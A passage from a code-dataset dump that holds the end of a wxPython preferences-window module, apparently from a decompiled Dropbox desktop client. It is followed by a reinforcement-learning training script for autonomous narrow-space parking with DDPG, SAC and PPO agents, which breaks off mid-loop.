wx.Choice(self, -1, choices=choices)\n self.langchoice.Bind(wx.EVT_CHOICE, self.handle_langchoice)\n if self.has_own_borders:\n self.l_box = wx.StaticBox(self, label=pref_strings.language_label)\n choice_vsizer = wx.StaticBoxSizer(self.l_box, wx.VERTICAL)\n choice_hsizer = wx.BoxSizer(wx.HORIZONTAL)\n choice_hsizer.Add(self.langchoice, proportion=1, flag=wx.EXPAND)\n choice_vsizer.Add(choice_hsizer, proportion=0, flag=wx.EXPAND | wx.ALL, border=platform.radio_static_box_interior)\n else:\n choice_vsizer = wx.BoxSizer(wx.HORIZONTAL)\n lang_text = wx.StaticText(self, label=pref_strings.language_colon)\n choice_vsizer.Add(lang_text, flag=wx.ALIGN_CENTER_VERTICAL)\n choice_vsizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0), proportion=0, flag=wx.EXPAND)\n choice_vsizer.Add(self.langchoice, flag=wx.ALIGN_CENTER_VERTICAL)\n border.Add(choice_vsizer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n url_map = {'url': self.dropbox_app.dropbox_url_info.help_url('open_source_software')}\n label = pref_strings.open_source_label % url_map\n open_source_note = StaticLinkText(self, label)\n 
open_source_note.SetBackgroundColour(self.parent.panel.GetBackgroundColour())\n border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n border.Add(open_source_note, flag=wx.ALIGN_CENTER_VERTICAL)\n border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n self.SetSizer(border)\n self.Layout()\n\n @assert_message_queue\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(AdvancedPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.dropbox_app = dropbox_app\n self.has_own_borders = has_own_borders\n self.border = None\n self.reset()\n\n @assert_message_queue\n def on_secondary_link(self, linked):\n self.reset()\n\n @message_sender(wx.CallAfter)\n def post_link_handler(self):\n self.selsync_launcher.Enable(True)\n self.location_changer.Enable(True)\n if self.secondary_selsync_launcher:\n self.secondary_selsync_launcher.Enable(True)\n if self.secondary_location_changer:\n self.secondary_location_changer.Enable(True)\n\n\nclass MainPanel(DropboxTabPanel):\n QUIT_LABEL_WIDTH = 150\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsMain.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.main_tab_label\n\n @staticmethod\n def help_index():\n return 'general'\n\n @event_handler\n def read(self, state):\n if arch.startup.can_configure_startupitem:\n self.startbox.SetValue(state[OPT_STARTUP])\n self.notifybox.SetValue(state[OPT_BUBBLES])\n self.lanbox.SetValue(state[OPT_P2P])\n\n @event_handler\n def save(self, theEvent):\n state = {}\n if arch.startup.can_configure_startupitem:\n state[OPT_STARTUP] = self.startbox.GetValue()\n state[OPT_BUBBLES] = self.notifybox.GetValue()\n state[OPT_P2P] = self.lanbox.GetValue()\n return state\n\n @event_handler\n def on_show(self):\n self.startbox.Show(arch.startup.can_configure_startupitem)\n self.Layout()\n self.parent.panel.Layout()\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(MainPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.pref_controller = self.dropbox_app.pref_controller\n self.camera_launcher = None\n border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n i_box = wx.StaticBox(self)\n i_sizer = wx.StaticBoxSizer(i_box, wx.VERTICAL)\n else:\n i_sizer = wx.BoxSizer(wx.VERTICAL)\n notifysizer = wx.BoxSizer(wx.HORIZONTAL)\n self.notifybox = wx.CheckBox(self, label=pref_strings.show_bubbles)\n self.notifybox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n notifysizer.Add(self.notifybox, border=platform.radio_static_box_interior, flag=wx.LEFT | wx.RIGHT | wx.TOP)\n notifysizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n i_sizer.Add(notifysizer, proportion=0, flag=wx.EXPAND)\n i_sizer.AddSpacer(wx.Size(0, platform.checkbox_group_spacer))\n startsizer = wx.BoxSizer(wx.HORIZONTAL)\n self.startbox = wx.CheckBox(self, label=pref_strings.startup_item)\n self.startbox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n startsizer.Add(self.startbox, border=platform.radio_static_box_interior, flag=wx.LEFT | wx.RIGHT)\n startsizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n i_sizer.Add(startsizer, proportion=0, flag=wx.EXPAND)\n i_sizer.AddSpacer(wx.Size(0, platform.checkbox_group_spacer))\n lansizer = wx.BoxSizer(wx.HORIZONTAL)\n self.lanbox = wx.CheckBox(self, label=pref_strings.p2p_enabled)\n self.lanbox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n lansizer.Add(self.lanbox, border=platform.checkbox_baseline_adjustment, flag=wx.ALIGN_BOTTOM | 
wx.BOTTOM)\n lansizer.AddSpacer(wx.Size(platform.radio_static_box_interior, 0), proportion=0, flag=wx.EXPAND)\n i_sizer.Add(lansizer, border=platform.radio_static_box_interior, proportion=0, flag=wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM)\n border.Add(i_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.SetSizerAndFit(border)\n self.Layout()\n\n\nclass PrefsFrame(DropboxTabbedFrame):\n PANELS = [MainPanel,\n AccountPanel,\n ImportPanel,\n BandwidthSettingsPanel,\n ProxySettingsPanel,\n AdvancedPanel]\n PANEL_NAME_TO_TYPE = {PanelNames.GENERAL: MainPanel,\n PanelNames.ACCOUNT: AccountPanel,\n PanelNames.IMPORT: ImportPanel,\n PanelNames.ADVANCED: AdvancedPanel}\n DEFAULT_PANEL = PANELS[0]\n first_show = True\n\n @message_sender(wx.CallAfter, block=True)\n def __init__(self, parent, dropbox_app, *n, **kw):\n kw['atable_extensions'] = [(wx.ACCEL_NORMAL, wx.WXK_CONTROL, self.on_ctrldown)]\n super(PrefsFrame, self).__init__(parent, dropbox_app, *n, **kw)\n self.pref_controller = dropbox_app.pref_controller\n dropbox_app.mbox.on_secondary_link.add_handler(self.on_secondary_link)\n\n @event_handler\n def switch_help_url(self):\n if self.help_link is not None:\n if WINDOWS_VERSION >= VISTA:\n the_os = 'vista'\n else:\n the_os = 'xp'\n new_url = self.dropbox_app.dropbox_url_info.help_url('prefs/%s/%s' % (the_os, self.current_panel_t.help_index()))\n self.help_link.SetLabel(u'%s' % (new_url, pref_strings.help_label))\n\n def setup(self, kw):\n kw['title'] = pref_strings.dropbox_prefs\n return kw\n\n @message_sender(wx.CallAfter)\n def on_secondary_link(self, linked):\n if linked is True or linked is False:\n for panel in self.all_panels.itervalues():\n panel.on_secondary_link(linked)\n\n self.update_biggest_dimensions()\n self.update_resize_sizer()\n self.re_layout()\n\n @event_handler\n def save(self, theEvent, skip_errors = False):\n state_update = {}\n for panel in itertools.chain((self.all_panels[panel_t] for panel_t in self.all_panels if panel_t == self.current_panel_t), (self.all_panels[panel_t] for panel_t in self.all_panels if panel_t != self.current_panel_t)):\n try:\n state_update.update(panel.save(theEvent))\n except InvalidEntryException as e:\n unhandled_exc_handler(False)\n if not skip_errors:\n self.panel_swapper_factory(e.args[0])(None)\n self.all_panels[e.args[0]].on_show()\n wx.MessageDialog(self, e.args[1], caption='', style=wx.OK | wx.ICON_EXCLAMATION).ShowModal()\n raise\n except Exception:\n unhandled_exc_handler()\n\n else:\n self.pref_controller.update(state_update)\n self.invalidate(theEvent, False)\n\n @event_handler\n def help(self, theEvent):\n the_url = self.dropbox_app.dropbox_url_info.help_url('prefs/linux/%s' % self.current_panel_t.help_index())\n self.dropbox_app.dropbox_url_info.launch_full_url(the_url)\n\n def post_init(self):\n pass\n\n @message_sender(wx.CallAfter)\n def read(self, pref_state):\n for panel in self.all_panels.values():\n panel.read(pref_state)\n\n self.invalidate(None, False)\n\n @event_handler\n def close(self, theEvent):\n TRACE('Closing prefs pane')\n if not hasattr(self.all_panels[self.DEFAULT_PANEL], 'location_changer') or self.all_panels[self.DEFAULT_PANEL].location_changer.not_moving.isSet():\n self.hide_user()\n\n @event_handler\n def on_ctrldown(self, *n):\n try:\n self.all_panels[AccountPanel].on_ctrldown(*n)\n except AttributeError:\n 
pass\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/ui/wxpython/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":51851,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"2633471694","text":"import math\nimport sys\nfrom typing import Dict, List\nimport os\nimport json\n\nimport numpy as np\nimport gym\n\nimport torch\nimport random\n\nimport argparse\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport platform\nimport sys\nsys_platform = platform.platform().lower()\nif \"windows\" in sys_platform:\n sys.path.append('D://project-ant/TPCAP/IEEE/Autonomous-Parking-Narrow-Space/')\nelif \"linux-4.15.0\" in sys_platform:\n sys.path.append('/mnt/disk_ant/yuanzheng/Autonomous-Parking-Narrow-Space/')\nelif \"linux-5.4.0\" in sys_platform:\n sys.path.append('//root/autodl-tmp/ant/Autonomous-Parking-Narrow-Space/')\n\nfrom rl.environment.env import Environment\nfrom rl.algorithms.PDDPG import Agent\nfrom rl.algorithms.PDDPG_C import Agent as PCAgent\nfrom rl.algorithms.PDDPG_C_IB import Agent as IBDDPGAgent\nfrom rl.algorithms.SAC import Agent as SACAgent\nfrom rl.algorithms.PPO import Agent as PPOAgent\nfrom rl.algorithms.IBAC_PPO import Agent as IBPPOAgent\nfrom rl.algorithms.augmentations import her_augmentation\nfrom rl.sparse_rewards.prioritized.test import test\nfrom rl.utils.savePath import show, saveCsv\nfrom rl.utils.dealData import *\nfrom Vehicle import OBCAPath, Vehicle, Path\nfrom pyobca.search import VehicleConfig\nfrom quadraticOBCA import quadraticPath\n\nfrom case import Case\n\n\n# fix random seed\ndef same_seeds(seed):\n print(\"===========Set the random seed: {}================\".format(seed))\n torch.manual_seed(seed) # 固定随机种子(CPU)\n if torch.cuda.is_available(): # 固定随机种子(GPU)\n torch.cuda.manual_seed(seed) # 为当前GPU设置\n torch.cuda.manual_seed_all(seed) # 为所有GPU设置\n np.random.seed(seed) # 保证后续使用random函数时,产生固定的随机数\n torch.backends.cudnn.benchmark = True # GPU、网络结构固定,可设置为True\n torch.backends.cudnn.deterministic = True # 固定网络结构\n\n\nsame_seeds(42)\n\n\ndef get_args():\n args = argparse.ArgumentParser(\"The args of TPCAP RL\")\n args.add_argument('--alg', type=str, default=\"DDPG\", help=\"The algorithm of model\")\n args.add_argument('--random_choice', action=\"store_true\", default=False, help=\"If random choice the path num?\")\n args.add_argument('--exp_name', default=\"test\", type=str, help=\"The name of exp\")\n args.add_argument('--maxT', type=int, default=40, help=\"The total time of simulation.\")\n args.add_argument('--dis_factor', type=int, default=5, help=\"The factor of dis loss\")\n args.add_argument('--delta_factor', type=int, default=10, help=\"The factor of delta loss\")\n args.add_argument('--obs_factor', type=float, default=10, help=\"The factor of obstacle avoidance\")\n args.add_argument('--her', action=\"store_true\", default=False, help=\"If use the her to augment data\")\n args.add_argument('--evaluate_loop', type=int, default=20, help=\"The frequency of evaluate\")\n args.add_argument('--case', type=int, default=7, help=\"The special case for training\")\n args.add_argument('--warm_start', action=\"store_true\", default=False, help=\"Generate the warm data to train\")\n args.add_argument('--action_c', action=\"store_true\", default=False, help=\"If use the continues action?\")\n args.add_argument('--large_interval', action=\"store_true\", default=False, help=\"Use the large control interval\")\n 
args.add_argument('--reward_back', action=\"store_true\", default=False, help=\"If use the reward back when using warm start\")\n args.add_argument('--cuda', action=\"store_true\", help='run on CUDA (default: False)')\n args.add_argument('--relative', action=\"store_true\", help=\"Use the relatively goal position\")\n args.add_argument('--obca', action=\"store_true\", default=False, help=\"Use the obca to deal data after test\")\n\n\n # ===================== DDPG Bottleneck===========================\n args.add_argument('--ddpg_hidden', type=int, default=256, help=\"The hidden dim of DDPG IB\")\n args.add_argument('--ddpg_std_init', type=float, default=0.3, metavar='G',\n help='action std init (default: 0.6)')\n\n # =====================Soft Actor Critic =========================\n args.add_argument('--sac_policy', default=\"Gaussian\",\n help='Policy Type: Gaussian | Deterministic (default: Gaussian)')\n args.add_argument('--sac_gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward (default: 0.99)')\n args.add_argument('--sac_tau', type=float, default=0.005, metavar='G',\n help='target smoothing coefficient(τ) (default: 0.005)')\n args.add_argument('--sac_lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\n args.add_argument('--sac_alpha', type=float, default=0.2, metavar='G',\n help='Temperature parameter α determines the relative importance of the entropy\\\n term against the reward (default: 0.2)')\n args.add_argument('--sac_batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\n args.add_argument('--sac_automatic_entropy_tuning', type=bool, default=False, metavar='G',\n help='Automaically adjust α (default: False)')\n args.add_argument('--sac_target_update_interval', type=int, default=1, metavar='N',\n help='Value target update per no. 
of updates per step (default: 1)')\n args.add_argument('--sac_hidden_size', type=int, default=256, metavar='N', help='hidden size (default: 256)')\n\n # ====================== PPO =================================\n args.add_argument('--ppo_gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward ppo')\n args.add_argument('--ppo_lr_actor', type=float, default=0.0003, metavar='G',\n help='learning rate of ppo actor')\n args.add_argument('--ppo_lr_critic', type=float, default=0.001, metavar='G',\n help='learning rate of ppo actor')\n args.add_argument('--ppo_adam_eps', type=float, default=1e-5, metavar='G',\n help='the adam eps of ppo')\n args.add_argument('--ppo_k_epochs', type=int, default=80, metavar='N',\n help='update policy for k epochs in one ppo update')\n args.add_argument('--ppo_eps_clip', type=float, default=0.2, metavar='G',\n help='clip parameter for ppo')\n args.add_argument('--ppo_hidden_size', type=int, default=256, metavar='N',\n help='hidden size (default: 256)')\n args.add_argument('--ppo_std_init', type=float, default=0.6, metavar='G',\n help='action std init (default: 0.6)')\n args.add_argument('--ppo_batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\n args.add_argument('--ppo_update_timestep', type=int, default=800, metavar='N',\n help='update timestep of ppo = max_len * 4')\n args.add_argument('--ppo_std_decay_rate', type=float, default=0.05, metavar='G',\n help='linearly decay action_std (action_std = action_std - action_std_decay_rate)')\n args.add_argument('--ppo_min_action_std', type=float, default=0.00, metavar='G',\n help='minimum action_std (stop decay after action_std <= min_action_std)')\n args.add_argument('--ppo_std_decay_freq', type=int, default=10000,\n help='action_std decay frequency (in num timesteps)')\n\n # ====================== IBAC PPO =============================\n args.add_argument('--ibppo_lr', type=float, default=0.0001,\n help=\"the learning rate for optimizers.\")\n args.add_argument('--ibppo_gae_lambda', type=float, default=0.95,\n help=\"the factor of gae lambda.\")\n args.add_argument('--ibppo_entropy_coef', type=float, default=0.01,\n help=\"the factor of entropy coef.\")\n args.add_argument('--ibppo_value_loss_coef', type=float, default=0.5,\n help=\"the factor of value loss coef.\")\n args.add_argument('--ibppo_max_grad_norm', type=float, default=0.5,\n help=\"the factor of max grad norm.\")\n args.add_argument('--ibppo_beta', type=float, default=1.0,\n help=\"the factor of beta.\")\n args.add_argument('--ibppo_sni_type', type=str, default=\"vib\",\n help=\"the type of sni.\")\n args.add_argument('--ibppo_use_bottleneck', action=\"store_true\", default=False,\n help=\"use the bottleneck.\")\n args.add_argument('--ibppo_use_l2a', action=\"store_true\", default=False,\n help=\"use the l2a.\")\n args.add_argument('--ibppo_use_bn', action=\"store_true\", default=False,\n help=\"use the batch norm.\")\n args.add_argument('--ibppo_use_dropout', action=\"store_true\", default=False,\n help=\"use the dropout.\")\n args.add_argument('--ibppo_use_l2w', action=\"store_true\", default=False,\n help=\"use the l2 loss of weight.\")\n args.add_argument('--res_net', action=\"store_true\", default=False,\n help=\"use the res net framework to actor\")\n\n return args.parse_args()\n\n\ndef warm_start(args, agent, tb=None, path_num=7, env=None, saveFigPath=None):\n print(\"================== Warm Start ====================\")\n inputfiledir = \"../../../Result/case-{}\".format(args.case)\n for j 
in range(4):\n inputfile = os.path.join(inputfiledir, \"data_{}\".format(j))\n path_t = np.load(os.path.join(inputfile, \"array_t.npy\"))\n path_x = np.load(os.path.join(inputfile, \"array_x.npy\"))\n path_y = np.load(os.path.join(inputfile, \"array_y.npy\"))\n path_v = np.load(os.path.join(inputfile, \"array_v.npy\"))\n path_a = np.load(os.path.join(inputfile, \"array_a.npy\"))\n path_yaw = np.load(os.path.join(inputfile, \"array_yaw.npy\"))\n path_steer = np.load(os.path.join(inputfile, \"array_steer.npy\"))\n path_steer_rate = np.load(os.path.join(inputfile, \"array_steer_rate.npy\"))\n new_path_t, new_path_x, new_path_y, new_path_v, new_path_a, new_path_yaw, new_path_steer, new_path_steer_rate = \\\n interpData(path_t, path_x, path_y, path_v, path_a, path_yaw, path_steer, path_steer_rate)\n # 反向计算,后面的奖励可以影响前面的奖励\n rewards = [0] * (len(new_path_t) - 1)\n for i in range(len(new_path_t)-1, 0, -1):\n state = generateObs(new_path_x[i], new_path_y[i], new_path_yaw[i], new_path_v[i], new_path_steer[i], agent.env, args)\n pre_state = generateObs(new_path_x[i-1], new_path_y[i-1], new_path_yaw[i-1], new_path_v[i-1],\n new_path_steer[i-1], agent.env, args)\n real_state = generateRealObs(new_path_x[i], new_path_y[i], new_path_yaw[i], new_path_v[i], new_path_steer[i],\n agent.env)\n real_pre_state = generateRealObs(new_path_x[i - 1], new_path_y[i - 1], new_path_yaw[i - 1], new_path_v[i - 1],\n new_path_steer[i - 1], agent.env)\n action = np.array([new_path_a[i-1]/agent.env.a_max, new_path_steer_rate[i-1]/agent.env.omega_max])\n reward, done = agent.env.cal_reward_from_state(real_state, real_pre_state)\n\n if i < len(new_path_t) - 1:\n if args.reward_back:\n reward = 0.8 * reward + 0.2 * rewards[i] # 后续奖励叠加\n else:\n reward = reward\n\n rewards[i-1] = reward\n\n agent.memory.add(pre_state, action, reward, state, done)\n\n for warm_train in range(1000):\n agent.optimize(tb)\n test_score, path = test(agent=agent, path_num=path_num, env=env, args=args)\n show(path, env.case, path_num, os.path.join(saveFigPath, \"fig/Warm-Start-Case-{}.svg\").format(path_num))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw, path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0, init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=-1, j=0, case_num=path_num)\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env, path_num=path_num)\n\n\ndef refineOBCA(path_x, path_y, path_yaw, goal_x, goal_y, goal_yaw, env, path_num=7):\n print(\"================= Operate By OBCA ===================\")\n initialPath = []\n for i in range(len(path_x)):\n initialPath.append(OBCAPath(path_x[i], path_y[i], path_yaw[i]))\n initialPath.append(OBCAPath(goal_x, goal_y, goal_yaw))\n obstacles = []\n for obs_i in range(len(env.case.obs)):\n obs = list(env.case.obs[obs_i])\n obstacles.append(obs)\n\n # OBCA二次优化\n cfg = VehicleConfig()\n cfg.T = 0.1\n gap = 1\n sampleT = 0.1\n vehicle = Vehicle()\n path_x, path_y, path_v, path_yaw, path_steer, path_a, path_steer_rate = quadraticPath(\n initialQuadraticPath=initialPath, obstacles=obstacles,\n vehicle=vehicle, max_x=env.case.xmax, max_y=env.case.ymax,\n min_x=env.case.xmin, min_y=env.case.ymin,\n gap=gap, cfg=cfg, sampleT=sampleT)\n obcaPath = Path(path_x, path_y, path_yaw)\n show(obcaPath, env.case, path_num, os.path.join(saveFigPath, \"fig/OBCA-Warm-Start-Case-{}.svg\").format(path_num))\n\n\n\nif __name__ == '__main__':\n 
TOTAL_PATH_NUM = [1, 2, 3, 7, 8, 13, 14]\n PATH_NUM = [1, 2, 3, 7]\n args = get_args()\n # Init. Environment\n if args.random_choice:\n # if random.random() > 0.5:\n # path_num = args.case\n # else:\n # path_num = random.choice(PATH_NUM)\n path_num = random.choice(PATH_NUM)\n # 记录最好成绩\n test_num_score = {key: -math.inf for key in TOTAL_PATH_NUM}\n test_num_best_score = -math.inf\n train_num_score = {key: -math.inf for key in TOTAL_PATH_NUM}\n else:\n path_num = args.case\n test_best_score = -math.inf\n env = Environment(path_num, args=args)\n env.reset(path_num)\n # Init. tensorboard summary writer\n tb = SummaryWriter(log_dir=os.path.abspath('data/{}/tensorboard'.format(args.exp_name)))\n # Init. Datapath\n data_path = os.path.abspath('data/{}'.format(args.exp_name))\n\n saveFigPath = os.path.join(data_path, \"evaluate\")\n\n if not os.path.exists(saveFigPath):\n os.mkdir(saveFigPath)\n os.mkdir(os.path.join(saveFigPath, \"fig\"))\n os.mkdir(os.path.join(saveFigPath, \"svg\"))\n os.mkdir(os.path.join(saveFigPath, \"csv\"))\n\n # Init. Training\n n_games: int = 2500\n best_score = -np.inf\n score_history: List[float] = [] * n_games\n avg_history: List[float] = [] * n_games\n logging_info: List[Dict[str, float]] = [] * n_games\n\n # Init. Agent\n if args.action_c:\n if args.alg == \"SAC\":\n agent = SACAgent(env=env, n_games=n_games, args=args)\n elif args.alg == \"PPO\":\n agent = PPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT/0.1)\n elif args.alg == \"IBPPO\":\n agent = IBPPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT / 0.1)\n elif args.alg == \"IBDDPG\":\n agent = IBDDPGAgent(env=env, n_games=n_games, args=args)\n else:\n # default DDPG\n agent = PCAgent(env=env, n_games=n_games)\n else:\n if args.alg == \"IBPPO\":\n agent = IBPPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT / 0.1)\n else:\n # default DDPG\n agent = Agent(env=env, n_games=n_games)\n\n if args.warm_start:\n warm_start(args, agent, tb, path_num, env, saveFigPath)\n\n time_step = 0\n\n for i in range(n_games):\n done: bool = False\n score: float = 0.0\n\n states: List[Dict[str, np.ndarray]] = []\n actions: List[np.ndarray] = []\n one_hot_actions: List[np.ndarray] = []\n next_states: List[Dict[str, np.ndarray]] = []\n\n # Initial Reset of Environment\n if args.random_choice:\n # if random.random() > 0.5:\n # path_num = args.case\n # else:\n # path_num = random.choice(PATH_NUM)\n path_num = random.choice(PATH_NUM)\n else:\n path_num = args.case\n OBS: Dict[str, np.ndarray] = env.reset(path_num)\n next_OBS: Dict[str, np.array]\n\n\n while not done:\n # Unpack the observation\n # [状态,回放所用的目标点:当前的位置,真实的目标点]\n state, curr_actgoal, curr_desgoal = OBS.values()\n assert len(curr_actgoal) == 3 and len(curr_desgoal) == 3, \"Error!\"\n # obs = np.concatenate((state, curr_actgoal, curr_desgoal))\n obs = np.array(state)\n\n # Choose agent based action & make a transition\n if args.alg == \"IBDDPG\":\n action, log_prob = agent.choose_action(obs, evaluate=False)\n else:\n action = agent.choose_action(obs, evaluate=False)\n\n next_OBS, reward, done = env.step(action)\n\n\n next_state, next_actgoal, next_desgoal = next_OBS.values()\n assert len(next_actgoal) == 3 and len(next_desgoal) == 3, \"Error!\"\n # next_obs = np.concatenate((next_state, next_actgoal, next_desgoal))\n next_obs = np.array(next_state)\n\n if args.action_c:\n one_hot_action = action\n else:\n one_hot_action = 
torch.nn.functional.one_hot(torch.tensor(action), agent.n_actions).numpy()\n\n if args.alg == \"PPO\":\n agent.buffer.rewards.append(reward)\n agent.buffer.is_terminals.append(done)\n elif args.alg == \"IBPPO\":\n agent.buffer.rewards.append(torch.unsqueeze(torch.tensor(reward, device=agent.device), dim=-1))\n agent.buffer.masks.append(1 - done)\n elif args.alg == \"IBDDPG\":\n agent.memory.add(obs, one_hot_action, reward, log_prob, next_obs, done)\n else:\n agent.memory.add(obs, one_hot_action, reward, next_obs, done)\n\n if args.alg == \"SAC\":\n agent.optimize(tb)\n elif args.alg == \"PPO\":\n # if (time_step+1) % args.ppo_update_timestep == 0:\n if done:\n loss = agent.optimize(tb)\n tb.add_scalar('loss', loss, i)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n elif args.alg == \"IBPPO\":\n if done:\n entropy, value, policy_loss, value_loss, kl, loss = agent.optimize(tb)\n tb.add_scalar('entropy', entropy, i)\n tb.add_scalar('value', value, i)\n tb.add_scalar('policy_loss', policy_loss, i)\n tb.add_scalar('value_loss', value_loss, i)\n tb.add_scalar('kl', kl, i)\n tb.add_scalar('loss', loss, i)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n elif args.alg == \"IBDDPG\":\n agent.optimize(tb)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n else:\n # default DDPG\n agent.optimize(tb)\n\n\n states.append(OBS)\n next_states.append(next_OBS)\n actions.append(action)\n one_hot_actions.append(one_hot_action)\n\n OBS = next_OBS\n score += reward\n time_step += 1\n\n if args.her:\n her_augmentation(agent, states, one_hot_actions, next_states)\n score_history.append(score)\n avg_score: float = np.mean(score_history[-100:])\n avg_history.append(avg_score)\n\n tb.add_scalar('path_{}_score'.format(path_num), score, i)\n tb.add_scalar('avg_score', avg_score, i)\n\n if args.random_choice:\n if score > train_num_score[path_num]:\n train_num_score[path_num] = score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED SINGLE SCORE! ***')\n elif avg_score > best_score:\n best_score = avg_score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED AVERAGE SCORE! ***')\n else:\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}')\n else:\n if avg_score > best_score:\n best_score = avg_score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED! ***')\n else:\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. 
Rewards: {avg_score:3.2f}')\n\n if i % args.evaluate_loop == 0:\n # 若是随机训练则每隔一定时间训练测试一次集合\n if args.random_choice:\n test_scores = []\n for path_num_item in TOTAL_PATH_NUM:\n test_score, path = test(agent=agent, path_num=path_num_item, env=env, args=args)\n test_scores.append(test_score)\n show(path, env.case, path_num_item,\n os.path.join(saveFigPath, \"fig/Case-{}-{}-{}.svg\").format(path_num_item, i, 0))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw,\n path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0,\n init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=i, j=0, case_num=path_num_item)\n if test_score > test_num_score[path_num_item]:\n print(\"Path Num: {} Occur The Best Score: {}\".format(path_num_item, test_score))\n test_num_score[path_num_item] = test_score\n show(path, env.case, path_num_item,\n os.path.join(saveFigPath, \"fig/Best-Case-{}-{}-{}.svg\").format(path_num_item, i, test_score))\n if path_num_item == 3:\n a = 1\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env,\n path_num=path_num_item)\n tb.add_scalar('test_path_{}_score'.format(path_num_item), test_score, int(i/args.evaluate_loop))\n tb.add_scalar('test_path_total_score', sum(test_scores), int(i / args.evaluate_loop))\n\n else:\n test_score, path = test(agent=agent, path_num=path_num, env=env, args=args)\n show(path, env.case, path_num, os.path.join(saveFigPath, \"fig/Case-{}-{}-{}.svg\").format(path_num, i, 0))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw, path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0, init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=i, j=0, case_num=path_num)\n if test_score > test_best_score:\n test_best_score = test_score\n print(\"Path Num: {} Occur The Best Score: {}\".format(path_num, test_score))\n show(path, env.case, path_num,\n os.path.join(saveFigPath, \"fig/Best-Case-{}-{}-{}.svg\").format(path_num, i, test_score))\n # 没获取到最优的路径后使用obca优化\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env, path_num=path_num)\n tb.add_scalar('test_path_{}_score'.format(path_num), test_score, int(i / args.evaluate_loop))\n\n\n episode_info = {\n 'Episode': i,\n 'Path Num': path_num,\n 'Total Episodes': n_games,\n 'Epidosic Summed Rewards': score,\n 'Moving Mean of Episodic Rewards': avg_score\n }\n\n logging_info.append(episode_info)\n\n # Add info. 
